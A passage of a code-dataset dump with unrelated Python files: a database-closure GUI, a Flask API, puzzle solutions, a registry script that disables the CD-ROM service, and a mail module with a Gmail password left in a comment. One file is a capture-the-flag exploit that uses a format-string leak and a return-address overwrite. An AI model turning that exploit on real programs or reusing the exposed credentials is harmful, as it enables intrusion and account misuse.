''.join(str(e) for e in R.closure(Z));\n\n #si Z+ = T entonces es una lave Unica\n uniqueKey = R.esLlaveUnica(R.closure(Z));\n\n\n if uniqueKey == True:\n strResult += '\\nClave única: ';\n strResult += ''.join(str(e) for e in T);\n\n \n #Paso 2 Llaves candidatas , concatena a Z\n pos=0;\n Z_cierre = R.closure(Z)\n\n\n for tTmp in R.getAttributes():\n zTmp = copy.deepcopy(Z_cierre);\n zTmp.append(tTmp)\n\n l1.append([zTmp,pos])\n pos = pos + 1\n\n \n \n #Paso 3\n strResult += '\\nLlaves candidatas M2\\n'\n for lTmp in l1:\n cantTmp = lTmp[1]+1\n\n for lTmp2 in range(cantTmp,len(l1)):\n lTmp3 = copy.deepcopy(lTmp[0]);\n lTmp3.append(T[cantTmp]);\n\n Rtemp = copy.deepcopy(R);\n\n cierrelTmp3 = Rtemp.closure(lTmp3)\n\n\n if(R.comparaListas(lTmp3,cierrelTmp3)):\n strResult += \"\\t\"\n strResult += ''.join(str(e) for e in lTmp3);\n strResult += \"\\n\"\n \n cantTmp = cantTmp+1\n\n\n\n\n self.textArea.setPlainText(strResult)\n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n #Calcula el recubrimiento mínimo, crea el listado de descriptores a partir de la función calculateClosureFromJson\n\n def recubrimientoMinimo(self,getList=False):\n\n try:\n\n #Verifica que se haya cargado un JSON\n\n if self.textAreaJson.toPlainText() == \"\":\n\n QMessageBox.question(self, 'Alerta', \"Cargue un archivo json\", QMessageBox.Ok, QMessageBox.Ok)\n\n else:\n\n file = open(self.fileNameJson,\"w\") \n\n file.write(self.textAreaJson.toPlainText()) \n\n file.close()\n\n #Obtiene el objeto de la lista con las dependencias, y aplca el algoritmo de recubrimiento mínimo\n\n r2 = self.calculateClosureFromJson(self.fileNameJson,True)\n\n\n\n #Paso 1 para todo A->Y divide las dependencias donde |Y| > 1\n\n self.textArea\n\n \n\n strResult = \"\"\n\n r2.divideDependencias()\n\n print(\"L1 = \",r2.printDependences())\n\n strResult += \"L1 = \"+r2.printDependences()+\"\\n\\n\";\n\n\n\n \n\n r2.elementosExtranos()\n\n strResult += \"L2 = \"+r2.printDependences()+\"\\n\\n\";\n\n\n\n r2.elmiinaRedundancias()\n\n strResult += \"L3 = \"+r2.printDependences()+\"\\n\\n\";\n\n \n\n if(getList == True):\n return r2\n else:\n self.textArea.setPlainText(strResult)\n \n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n\n\n def calculateClosureWithDescriptors(self):\n\n try:\n\n decriptores = self.textboxDecriptor.text()\n\n\n\n decriptoresList = decriptores.strip().split(',')\n\n for decriptor in decriptoresList:\n\n descriptors.append(decriptor)\n\n\n\n print(\"Cierre para:\",descriptors)\n\n print(\"Resultado:\")\n\n c = r.closure(descriptors)\n\n \n\n print(c)\n\n \n\n result = \"cierre: \"\n\n for i in range(0, len(c)):\n\n if i == (len(c)-1):\n\n result += c[i];\n\n else:\n\n result += c[i]+\",\";\n\n \n\n self.textArea.setPlainText(result)\n\n \n\n dataOutJson['descriptors'] = descriptors\n\n dataOutJson['closure'] = c\n\n \n\n with open('output.json', 'w') as outFile:\n\n json.dump(dataOutJson, outFile)\n\n \n\n self.resetVar()\n \n except:\n QMessageBox.question(self, 'Alerta', \"Error\", QMessageBox.Ok, QMessageBox.Ok)\n\n \n\nif __name__ == '__main__':\n\n app = QApplication(sys.argv)\n\n ex = App()\n\n sys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"517859296","text":"\n\nfrom xai.brain.wordbase.nouns._wrinkle import _WRINKLE\n\n#calss header\nclass _WRINKLES(_WRINKLE, ):\n\tdef __init__(self,): \n\t\t_WRINKLE.__init__(self)\n\t\tself.name = \"WRINKLES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"wrinkle\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_wrinkles.py","file_name":"_wrinkles.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"68435709","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport math\n\nn=input('Digite o valor de n:')\nif n<=0:\n n=n*(-1)\ni=1\nj=n\ns=0\n\nwhile i<=n:\n s=s+(i/j)\n i=i+1\n j=j-1\nprint ('%.5f' %s)","sub_path":"moodledata/vpl_data/30/usersdata/68/9360/submittedfiles/atividade.py","file_name":"atividade.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"590745615","text":"from gluon import *\nfrom gluon.tools import Mail\nimport os\nfrom gluon.contrib.appconfig import AppConfig\n#from gluon.tools import Auth\n# -*- coding: utf-8 -*-\n# try something like\ndef join_email(mem_id, mem_first, address, folder, renew=False): \n #mail = auth.settings.mailer\n myconf = AppConfig(reload=True)\n mail = Mail()\n mail.settings.server = myconf.get('smtp.server')\n mail.settings.sender = myconf.get('smtp.sender')\n mail.settings.login = myconf.get('smtp.login')\n# mail.settings.tls = myconf.get('smtp.tls') or False\n# mail.settings.ssl = myconf.get('smtp.ssl') or False\n \n# mail = Mail()\n# mail.settings.server = 'smtp.gmail.com:587'\n# mail.settings.sender = 'wpa4membership@gmail.com'\n# mail.settings.login = 'wpa4membership@gmail.com:mbrsstand2gether'\n \n join = \"Thank you for joining Woodley Park Archers. \"\n if(renew == True): join = \"Thank you for renewing with Woodley Park Archers. \"\n htmlmsg = u\"\"\"

\"\"\"\n htmlmsg += \"Hi {},
\".format(mem_first[0])\n if(len(mem_id) == 1):\n htmlmsg += join\n htmlmsg += \"Your member number is {:06d}. \".format(mem_id[0])\n else:\n htmlmsg += join + \"
\"\n for i in range(len(mem_id)):\n htmlmsg += \"{}'s member number is {:06d}.
\".format(mem_first[i], mem_id[i])\n htmlmsg += \"Please read the letter from our president below.
\"\n htmlmsg += \"Sam Amundson
\"\n htmlmsg += \"Membership Chair
\"\n htmlmsg += \"Woodley Park Archers

\"\n# htmlmsg = self.textToHtml(text)\n htmlmsg += \"\"\"

\n WoodleyParkArchers.org

\"\"\"\n htmlmsg += \"\"\"

\n Facebook: Woodley Park Archers

\"\"\"\n htmlmsg += \"\"\"\"\"\"\n with open(os.path.join(folder, 'static', 'emailbody.txt'), 'r') as f:\n for line in f:\n htmlmsg += u\"\"\"

{}

\"\"\".format(line.decode('utf-8'))\n htmlmsg += \"\"\"\"\"\"\n mail.send('sam.amundson@gmail.com', 'Woodley Park Archers Membership Confirmation', htmlmsg,\n attachments = mail.Attachment(os.path.join(folder, 'static', 'Header.png'), content_id='photo'),\n bcc=['sam_08123@yahoo.com'])\n return\n","sub_path":"mem1/modules/mem1email.py","file_name":"mem1email.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"31631502","text":"# n,m=[int(i) for i in input().split()]\n# a=[]\n# for i in range(n):\n# # mi,ri=[int(i) for i in input().split()]\n# a.append([int(i) for i in input().split()])\n# print(a)\n# a=[[2, 4], [2, 35], [1, 43], [2, 10]]\n\nn, m = [int(i) for i in input().split()]\nmi, ri = [], []\n\nfor i in range(n):\n a, b = [int(i) for i in input().split()]\n mi.append(a)\n ri.append(b)\ndp = [[0 for _ in range(m + 1)] for _ in range(n + 1)]\n\nfor i in range(1, n + 1):\n for j in range(1, m + 1):\n if mi[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n else:\n dp[i][j] = max(dp[i - 1][j - mi[i - 1]] + ri[i - 1], dp[i - 1][j]) #n个m分钟\nprint(dp[n][m])","sub_path":"笔试面试题/2020BISHI/公司笔试记录/新建文件夹/bili3.py","file_name":"bili3.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"27637450","text":"#!/usr/bin/python3\n\"\"\"\nthis text_indentation module contains only text_indentation()\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n Print a text with 2 newlines after the characters: .?:\n \"\"\"\n if type(text) is not str:\n raise TypeError('text must be a string')\n cont = False\n for x in text.strip(' '):\n if cont:\n cont = False\n continue\n if x in '.?:':\n print('{}\\n\\n'.format(x), end='')\n cont = True\n else:\n print(x, end='')\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"568523291","text":"import os, sys\nimport unittest\nfrom porthole import config, ConnectionManager\nfrom porthole.models import metadata\nfrom tests.fixtures import test_metadata, create_fixtures\nfrom tests.test_ConnectionManager import TestConnectionManager\nfrom tests.test_Mailer import TestMailer\nfrom tests.test_SimpleWorkflow import TestSimpleWorkflow\nfrom tests.test_RelatedRecord import TestRelatedRecord\nfrom tests.test_Reports import TestBasicReport, TestGenericReport, TestReportRunner\nfrom tests.test_Queries import TestQueries, TestRowDict\nfrom tests.test_components import TestReportWriter, TestReportActiveChecker\nfrom tests.test_filters import TestResultFilter\n# Query Handlers\n# Time Helper\nfrom tests.test_WorkbookBuilder import TestWorkbookBuilder\n\n# Disable\ndef blockPrint():\n sys.stdout = open(os.devnull, 'w')\n\n\n# Restore\ndef enablePrint():\n sys.stdout = sys.__stdout__\n\n\ndef setup_test_db():\n db = config['Default']['database']\n if config[db]['rdbms'] == 'sqlite':\n cm = ConnectionManager(db)\n cm.connect()\n metadata.create_all(cm.engine)\n test_metadata.create_all(cm.engine)\n create_fixtures(cm)\n cm.close()\n\n\ndef teardown_test_db():\n try:\n os.unlink('test.db')\n except FileNotFoundError:\n pass\n\n\ndef main():\n # blockPrint()\n\n # Select all of your test classes here.\n test_classes_to_run = [\n TestConnectionManager,\n TestSimpleWorkflow,\n TestRelatedRecord,\n TestBasicReport,\n TestGenericReport,\n TestMailer,\n TestReportRunner,\n TestQueries,\n TestRowDict,\n TestReportWriter,\n TestReportActiveChecker,\n TestResultFilter,\n TestWorkbookBuilder\n ]\n\n # Setup\n loader = unittest.TestLoader()\n # # Process and load test suites\n suites_list = [loader.loadTestsFromTestCase(test_class) for test_class in test_classes_to_run]\n # Test all of the things!\n executive_test_suite = unittest.TestSuite(suites_list)\n unittest.TextTestRunner(verbosity=1).run(executive_test_suite)\n\n # enablePrint()\n\n\nif __name__ == '__main__':\n setup_test_db()\n main()\n teardown_test_db()\n","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"98991103","text":"#!/usr/bin/python3\n\"\"\"\nroute for handling Review objects and operations\n\"\"\"\nfrom flask import jsonify, abort, request\nfrom api.v1.views import app_views, storage\nfrom models.review import Review\n\n\n@app_views.route(\"/places//reviews\", methods=[\"GET\"],\n strict_slashes=False)\ndef reviews_by_place(place_id):\n \"\"\"\n retrieves all Review objects by place\n :return: json of all reviews\n \"\"\"\n review_list = []\n place_obj = storage.get(\"Place\", str(place_id))\n\n if place_obj is None:\n abort(404)\n\n for obj in place_obj.reviews:\n review_list.append(obj.to_json())\n\n return jsonify(review_list)\n\n\n@app_views.route(\"/places//reviews\", methods=[\"POST\"],\n strict_slashes=False)\ndef review_create(place_id):\n \"\"\"\n create REview route\n :return: newly created Review obj\n \"\"\"\n review_json = request.get_json(silent=True)\n if review_json is None:\n abort(400, 'Not a JSON')\n if not storage.get(\"Place\", place_id):\n abort(404)\n if not storage.get(\"User\", review_json[\"user_id\"]):\n abort(404)\n if \"user_id\" not in review_json:\n abort(400, 'Missing user_id')\n if \"text\" not in review_json:\n abort(400, 'Missing text')\n\n review_json[\"place_id\"] = place_id\n\n new_review = Review(**review_json)\n new_review.save()\n resp = jsonify(new_review.to_json())\n resp.status_code = 201\n\n return resp\n\n\n@app_views.route(\"/reviews/\", methods=[\"GET\"],\n strict_slashes=False)\ndef review_by_id(review_id):\n \"\"\"\n gets a specific Review object by ID\n :param review_id: place object id\n :return: review obj with the specified id or error\n \"\"\"\n\n fetched_obj = storage.get(\"Review\", str(review_id))\n\n if fetched_obj is None:\n abort(404)\n\n return jsonify(fetched_obj.to_json())\n\n\n@app_views.route(\"/reviews/\", methods=[\"PUT\"],\n strict_slashes=False)\ndef review_put(review_id):\n \"\"\"\n updates specific Review object by ID\n :param review_id: Review object ID\n :return: Review object and 200 on success, or 400 or 404 on failure\n \"\"\"\n place_json = request.get_json(silent=True)\n\n if place_json is None:\n abort(400, 'Not a JSON')\n\n fetched_obj = storage.get(\"Review\", str(review_id))\n\n if fetched_obj is None:\n abort(404)\n\n for key, val in place_json.items():\n if key not in [\"id\", \"created_at\", \"updated_at\", \"user_id\",\n \"place_id\"]:\n setattr(fetched_obj, key, val)\n\n fetched_obj.save()\n\n return jsonify(fetched_obj.to_json())\n\n\n@app_views.route(\"/reviews/\", methods=[\"DELETE\"],\n strict_slashes=False)\ndef review_delete_by_id(review_id):\n \"\"\"\n deletes Review by id\n :param : Review object id\n :return: empty dict with 200 or 404 if not found\n \"\"\"\n\n fetched_obj = storage.get(\"Review\", str(review_id))\n\n if fetched_obj is None:\n abort(404)\n\n storage.delete(fetched_obj)\n storage.save()\n\n return jsonify({})\n","sub_path":"api/v1/views/places_reviews.py","file_name":"places_reviews.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525380740","text":"import sys\n\nn = int(sys.stdin.readline())\n\ndef fibonocci(n,result):\n result.append((0,1,0))\n result.append((1,0,1))\n\n for i in range(n+1):\n if i > 1:\n _sum = result[i-1][0] + result[i-2][0]\n t0 = result[i-1][1] + result[i-2][1]\n t1 = result[i-1][2] + result[i-2][2]\n result.append((_sum,t0,t1))\n return result[n][0],result[n][1],result[n][2]\nfor i in range(n):\n line = sys.stdin.readline().rstrip()\n buffer = int(line)\n result = []\n r,t0,t1 = fibonocci(buffer,result)\n print(t0,t1)\n\n \"\"\"\n //bottom to top\n result[0] = (0,1,0)\n result[1] = (1,0,1)\n\n for i = 0 to n\n if result[n] = empty\n result[n] = result[n-1] + result[n-2]#각각 column대로 더하기\n 피보나치 수열은 다음처럼 구성된다\n 0 1 1 2 3 5 8 ... 값\n 0 1 2 3 4 5 6 ... 인덱스\n\n fib(n)에 대해서 결과 값과 0과 1이 나온 횟수를 (_sum, t0, t1)이라고 tuple로 만들자. 그러면\n fib(0) = (0,1,0) \n fib(1) = (1,0,1)\n\n fib(2) = fib(0) + fib(1) = (1,1,1)이다.\n fib(3) = fib(2) + fib(1) = (2,1,2)이다.\n n이 1 증가할 때 기존의 fib(n-1)에 속한 0과 1의 수에 fib(n-2)속한 0과 1의 수를 각각 더해진다.\n\n bottomup 방식으로 하면 n까지 그냥 다 더하면 된다.\n\n \"\"\"","sub_path":"code/1003/1003_dp_bottomTop.py","file_name":"1003_dp_bottomTop.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129688781","text":"from winreg import *\nfrom tkinter import *\n\nwin = Tk()\n\nwin.title(\"CDROM Controler\")\nwin.geometry(\"400x400\")\nwin.resizable(0,0)\n\n\n#This is Function for Disable CDROM\ndef disable_cdrom():\n keyVal = r'SYSTEM\\CurrentControlSet\\Services\\cdrom'\n try:\n key = OpenKey(HKEY_LOCAL_MACHINE,keyVal,0,KEY_ALL_ACCESS)\n l3= Label (win, text=\"CDROM Is Disabled.\").pack()\n except:\n key = CreateKey(HKEY_LOCAL_MACHINE,keyVal)\n SetValueEx(key,\"start\",0,REG_DWORD,4)\n CloseKey(key)\n\ndef enable_cdrom():\n keyVal = r'SYSTEM\\CurrentControlSet\\Services\\cdrom'\n try:\n key = OpenKey(HKEY_LOCAL_MACHINE,keyVal,0,KEY_ALL_ACCESS)\n l3= Label (win, text=\"CDROM Is Enabled.\").pack()\n except:\n key = CreateKey(HKEY_LOCAL_MACHINE,keyVal)\n SetValueEx(key,\"start\",0,REG_DWORD,1)\n CloseKey(key)\n\n\ndisable_button = Button (win, text=\"CDROM Disable\", fg=\"red\", bg=\"yellow\", command= disable_cdrom).pack(padx=10, pady=10)\nenable_button = Button (win, text=\"CDROM Enable\", fg=\"red\", bg=\"yellow\", command= enable_cdrom).pack(padx=10, pady=10)\n\nwin.mainloop()\n","sub_path":"Pentest and Network/VIRUS_GUI/T4_CDROM_Controler/CDROM_CNTRL.py","file_name":"CDROM_CNTRL.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"367385662","text":"\"\"\"\nType annotations for honeycode service literal definitions.\n\n[Open documentation](https://vemel.github.io/boto3_stubs_docs/mypy_boto3_honeycode/literals.html)\n\nUsage::\n\n ```python\n from mypy_boto3_honeycode.literals import ErrorCodeType\n\n data: ErrorCodeType = \"ACCESS_DENIED\"\n ```\n\"\"\"\nimport sys\n\nif sys.version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal\n\n__all__ = (\n \"ErrorCodeType\",\n \"FormatType\",\n \"ImportDataCharacterEncodingType\",\n \"ImportSourceDataFormatType\",\n \"ListTableColumnsPaginatorName\",\n \"ListTableRowsPaginatorName\",\n \"ListTablesPaginatorName\",\n \"QueryTableRowsPaginatorName\",\n \"TableDataImportJobStatusType\",\n \"UpsertActionType\",\n)\n\nErrorCodeType = Literal[\n \"ACCESS_DENIED\",\n \"FILE_EMPTY_ERROR\",\n \"FILE_NOT_FOUND_ERROR\",\n \"FILE_PARSING_ERROR\",\n \"FILE_SIZE_LIMIT_ERROR\",\n \"INVALID_FILE_TYPE_ERROR\",\n \"INVALID_IMPORT_OPTIONS_ERROR\",\n \"INVALID_TABLE_COLUMN_ID_ERROR\",\n \"INVALID_TABLE_ID_ERROR\",\n \"INVALID_URL_ERROR\",\n \"RESOURCE_NOT_FOUND_ERROR\",\n \"SYSTEM_LIMIT_ERROR\",\n \"TABLE_NOT_FOUND_ERROR\",\n \"UNKNOWN_ERROR\",\n]\nFormatType = Literal[\n \"ACCOUNTING\",\n \"AUTO\",\n \"CONTACT\",\n \"CURRENCY\",\n \"DATE\",\n \"DATE_TIME\",\n \"NUMBER\",\n \"PERCENTAGE\",\n \"ROWLINK\",\n \"ROWSET\",\n \"TEXT\",\n \"TIME\",\n]\nImportDataCharacterEncodingType = Literal[\n \"ISO-8859-1\", \"US-ASCII\", \"UTF-16\", \"UTF-16BE\", \"UTF-16LE\", \"UTF-8\"\n]\nImportSourceDataFormatType = Literal[\"DELIMITED_TEXT\"]\nListTableColumnsPaginatorName = Literal[\"list_table_columns\"]\nListTableRowsPaginatorName = Literal[\"list_table_rows\"]\nListTablesPaginatorName = Literal[\"list_tables\"]\nQueryTableRowsPaginatorName = Literal[\"query_table_rows\"]\nTableDataImportJobStatusType = Literal[\"COMPLETED\", \"FAILED\", \"IN_PROGRESS\", \"SUBMITTED\"]\nUpsertActionType = Literal[\"APPENDED\", \"UPDATED\"]\n","sub_path":"typings/mypy_boto3_honeycode/literals.pyi","file_name":"literals.pyi","file_ext":"pyi","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"410018042","text":"from pwn import *\n\n#calculate libc base fiirst %p - 0x1eb723\n#libc_offset = 0x1eb72\npie_offset = 0xb21\nwin_offset = 0x9ec\nret_offset = 0xaf3\n\nleak = \"AAAA %39$lp BBBB\"\nspell = \"Expelliarmus\\x00\"\npad = cyclic(0xff+0xf)\n\n#p = remote(\"hax1.allesctf.net\",9100)\np = process(\"./pwn1\")\n\nprint(p.recvline())\np.sendline(leak)\ntmp = p.recvuntil(\"spell:\")\nprint(tmp)\n\npie_addr = tmp.split()[-6]\nprint(pie_addr)\n\npie_base = int(pie_addr,16)-pie_offset\nwin_fun = pie_base+win_offset\nprint(\"[*] PIE base addr: {}\".format(hex(pie_base)))\nprint(\"[*] WINgardium addr: {}\".format(hex(win_fun)))\n\nret = pie_base + ret_offset\n\nraw_input(\"Exploit ?\")\nidx = cyclic_find(\"cnaacoaa\")\n\np.sendline(spell+pad[:idx]+p64(ret)+p64(win_fun))\np.interactive()\n","sub_path":"cscg/pwn/pwn1/exp1.py","file_name":"exp1.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495816989","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Arch Control Panel - Systemd Manager\nimport os,subprocess,windowsize,aaa\n\ndef systemd():\n\tsysdstate=1\n\tos.system(\"clear\")\n\twhile sysdstate==1:\n\n\t\taaa.hr()\n\t\tprint(\"\"\" Arch Control Panel Systemd Manager\n\n1- List running services\n2- List failed services\n3- See status of a service\n\n4- Enable service(s)\n5- Disable service(s)\n6- Start service(s)\n7- Stop service(s)\n8- Restart service(s)\n9- Reload service(s)\n10- Reload systemd\n\n11- Exit from Systemd Manager\n\nYour choice> \"\"\")\n\t\tchoice=int(input())\n\t\tif choice==1:\n\t\t\tos.system(\"systemctl\")\n\t\n\t\telif choice==2:\n\t\t\tos.system(\"systemctl --failed\")\n\t\t\n\t\telif choice==3:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl status \" + service)\n\t\t\n\t\telif choice==4:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl enable \" + service)\n\n\t\telif choice==5:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl disable \" + service)\n\n\t\telif choice==6:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl start \" + service)\n\t\n\t\telif choice==7:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl stop \" + service)\n\t\t\t\n\t\telif choice==8:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl restart \" + service)\n\n\t\telif choice==9:\n\t\t\tprint(\"Service(s): \", end=\"\")\n\t\t\tservice=input()\n\t\t\tos.system(\"systemctl reload \" + service)\n\t\t\t\n\t\telif choice==10:\n\t\t\tos.system(\"systemctl daemon-reload\")\n\t\t\t\n\t\telif choice==11:\n\t\t\tsysdstate=0\n\t\t\t\n\t\telse:\n\t\t\tprint (\"Invalid choice\")\n\t\n\n\n\n","sub_path":"systemdmanager.py","file_name":"systemdmanager.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"19663544","text":"from itertools import combinations, permutations\nimport heapq\n\nfrom random import choice\n\nimport re\n\nfrom collections import OrderedDict\n\ndef replacenth(string, sub, wanted, n):\n where = [m.start() for m in re.finditer(sub, string)][n-1]\n before = string[:where]\n after = string[where:]\n after = after.replace(sub, wanted, 1)\n newString = before + after\n return newString\n\n \nTAB = '\\t'\nNL = '\\n'\n\nex2 = \"\"\"class: 0-1 or 4-19\nrow: 0-5 or 8-19\nseat: 0-13 or 16-19\n\nyour ticket:\n11,12,13\n\nnearby tickets:\n3,9,18\n15,1,5\n5,14,9\"\"\"\n\nexample_input = '''class: 1-3 or 5-7\nrow: 6-11 or 33-44\nseat: 13-40 or 45-50\n\nyour ticket:\n7,1,14\n\nnearby tickets:\n7,3,47\n40,4,50\n55,2,20\n38,6,12'''\n\npuzzle_input = \"\"\"\"\"\"\n\nTARGET = 71\n\n\n\nwith open(\"day16.txt\") as f:\n puzzle_input = f.read()\n\nexample_input = example_input.split(NL)\npuzzle_input = puzzle_input.split(NL)\nex2 = ex2.split(NL)\n\nexamples = [example_input, ex2]\ntargets = [TARGET, None]\n\n\ndef sudoku(d):\n \n print(\"{:<20}\".format(\"X\"), end=\" \")\n for i in range(20):\n\n print(\"{:<4}\".format(i), end= \" \")\n\n print()\n\n for f, j in d.items():\n\n print(\"{:<20}\".format(f), end=\" \")\n for i in range(20):\n if i in j:\n print(\"{:<4}\".format(i), end= \" \")\n else:\n print(\"{:<4}\".format(\" \"), end= \" \")\n print()\n\n \n\n\n\ndef log(*s, end=NL):\n if LOG:\n for i in s:\n print(i, end=\" \")\n print(end, end=\"\")\n\ndef print_grid(data):\n for i, row in enumerate(data):\n for j, cell in enumerate(row):\n\n p = ' '\n if i == y and j == x:\n p = '!'\n log(\"{1}{0}{1}\".format(i, p))\n log()\n\n\n \ndef solve(data, cap):\n\n result = None\n\n details = {}\n\n tickets = {} \n \n stuff = \"\"\n ticket = False\n nearby = False\n for line in data:\n \n \n if ticket:\n ticket = False\n tickets[\"your ticket\"] = list(map(int, line.split(\",\")))\n\n if nearby: \n try:\n tickets[\"nearby\"].append(list(map(int, line.split(\",\"))))\n except:\n tickets[\"nearby\"] = [list(map(int, line.split(\",\")))]\n\n\n\n\n\n if \"your ticket\" in line:\n ticket = True\n continue\n\n elif \"nearby\" in line:\n nearby = True\n continue\n\n\n \n if \":\" in line:\n x, y = line.split(\":\")\n\n details[x] = y.split(\" or \")\n\n\n\n invalid = []\n\n for count, ticket in enumerate(list(tickets[\"nearby\"])):\n\n\n\n ticket_valid = True\n for t in ticket:\n valid = False\n #print(\"t is\", t)\n for field, params in details.items(): \n \n for p in params:\n\n mini, maxi = p.split(\"-\")\n\n if int(t) >= int(mini) and int(t) <= int(maxi):\n \n valid = True\n\n if not valid:\n ticket_valid = False\n invalid.append(t)\n \n if not ticket_valid:\n print(\"removing ticket\")\n print(ticket) \n\n tickets[\"nearby\"].remove(ticket)\n \n print(len(tickets[\"nearby\"]), 'nearby tyickets remain')\n input()\n return sum(invalid), details, tickets\n\n\ndef solve2(details, tickets):\n \n \n field_map = {f:{\"valid\":set(), \"range\":v} for f, v in details.items()}\n\n valid_map = OrderedDict({f:[] for f in details.keys()})\n \n\n print(len(tickets[\"nearby\"]), 'nearby tyickets remain')\n input()\n\n all_tickets = list([tickets[\"your ticket\"]])\n\n\n all_tickets.extend(tickets[\"nearby\"])\n \n \n \n field_list = list(field_map.keys())\n print(field_list)\n \n #print(field_list)\n ## loop through each field\n i = 0\n\n\n ticket_valid_map = OrderedDict({i:{} for i in range(len(all_tickets))})\n\n for ticket_no, ticket in enumerate(all_tickets): ## loop through each ticket\n \n for column in range(len(ticket)):\n ticket_valid_map[ticket_no][column] = []\n i = 0 \n while i < len(field_list):\n\n field_valid_for_column = True\n\n \n \n field = str(field_list[i])\n lo1, hi1 = map(int, field_map[field][\"range\"][0].split(\"-\"))\n lo2, hi2 = map(int, field_map[field][\"range\"][1].split(\"-\"))\n \n\n \n t = int(ticket[column]) \n \n if not ((t >= lo1 and t <= hi1) or (t >= lo2 and t <= hi2)):\n\n field_valid_for_column = False\n \n \n\n if field_valid_for_column:\n #print(\"field\", field, \"VALID for column\", column)\n if LOG:\n input()\n #print(field_list[i])\n ticket_valid_map[ticket_no][column].append(field)\n \n \n\n i += 1\n\n print(\"finished loop\")\n\n for ticket, data in ticket_valid_map.items():\n\n for col, fields in data.items():\n \n print(\"ticket\", ticket, \"col\", col, \"only has these possibilities\", fields)\n print(all_tickets[ticket])\n\n input()\n\n\n chosen_field = choice(list(valid_map.keys()))\n log(\"Chose\", chosen_field)\n\n all_poss = set()\n [all_poss.update(v) for v in valid_map.values()]\n\n log(\"possibilities are\", all_poss)\n\n\n\n\n\n print(valid_map)\n \n final_valid_map = {k:list(v) for k, v in valid_map.items()}\n\n [final_valid_map.pop(key) for key in valid_map.keys() if not key.startswith(\"departure\")]\n\n \n \n\n print(final_valid_map)\n\n \n\n\n sudoku(final_valid_map)\n\n input(\"help\")\n\n \n ## match columns to tickets\n\n my_ticket = list(map(int, ['157', '73', '79', '191', '113', '59', '109', '61', '103', '101', '67', '193', '97', '179', '107', '89', '53', '71', '181', '83']))\n\n final_ticket = {k:None for k in my_ticket}\n\n\n final_poss = []\n\n while True:\n this_poss = []\n \n\n while len(this_poss) < 6:\n \n \n for key, possibilities in final_valid_map.items():\n \n \n removed = possibilities.pop(0)\n\n if removed not in this_poss and len(this_poss) < 6:\n this_poss.append(removed)\n \n \n possibilities.append(removed)\n \n \n \n \n \n print(this_poss)\n \n final_poss.append(this_poss)\n\n if final_poss.count(final_poss[-1]) > 1:\n break\n \n \n\n\n\n ## go through unknown columns, check values against ranges\n \n \n\n\n\n \n \n\n \n \n\n \n\n \n \n \n\n \n\n \n \nLOG = False\n\nd = OrderedDict([('departure location', {6, 7, 10, 13, 16, 17}), ('departure station', {16, 10, 6, 7}), ('departure platform', {4, 6, 7, 10, 13, 16, 17}), ('departure track', {1, 4, 6, 7, 10, 13, 16, 17}), ('departure date', {4, 6, 7, 10, 13, 16, 17}), ('departure time', {6, 7, 10, 16, 17}), ('arrival location', {7}), ('arrival station', {1, 4, 6, 7, 10, 13, 16, 17}), ('arrival platform', {0, 1, 4, 6, 7, 10, 11, 13, 16, 17}), ('arrival track', {10, 6, 7}), ('class', {0, 1, 4, 6, 7, 10, 13, 16, 17}), ('duration', {10, 6, 7}), ('price', {7}), ('route', {16, 10, 6, 7}), ('row', {0, 1, 4, 6, 7, 10, 13, 16, 17}), ('seat', {10, 6, 7}), ('train', 